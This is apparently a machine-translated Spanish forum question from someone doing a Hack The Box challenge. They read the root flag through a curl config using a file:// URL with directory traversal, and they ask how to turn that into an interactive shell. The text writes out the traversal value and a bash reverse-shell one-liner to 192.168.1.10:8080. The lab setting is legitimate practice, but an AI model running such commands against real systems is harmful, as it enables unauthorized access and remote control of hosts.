Así que estoy haciendo un desafío de HTB en el que he aprovechado el uso del cuadro de objetivos al leer un archivo que establece una URL para curl
para cruzar el directorio y mostrar el indicador de raíz en un informe que es parte de el ejercicio.
Contenido del archivo: url = file:///127.0.0.1/../../../root/root.txt
Todo genial.
Lo que quiero hacer es aprovechar esto para generar un shell leyendo /bin/bash
. Puedo leer la versión ilegible de /bin/bash
en el archivo de informe, pero no puedo entender cómo ejecutarlo de una manera que me dé un shell interactivo.
¿Qué puedo hacer para lograr esto?
EDITAR:
Puedo crear una shell inversa desde mi usuario actual usando bash y el comando a continuación, simplemente no puedo hacer que se ejecute como me gustaría desde 'dentro' de rizo.
bash -i >& /dev/tcp/192.168.1.10/8080 0>&1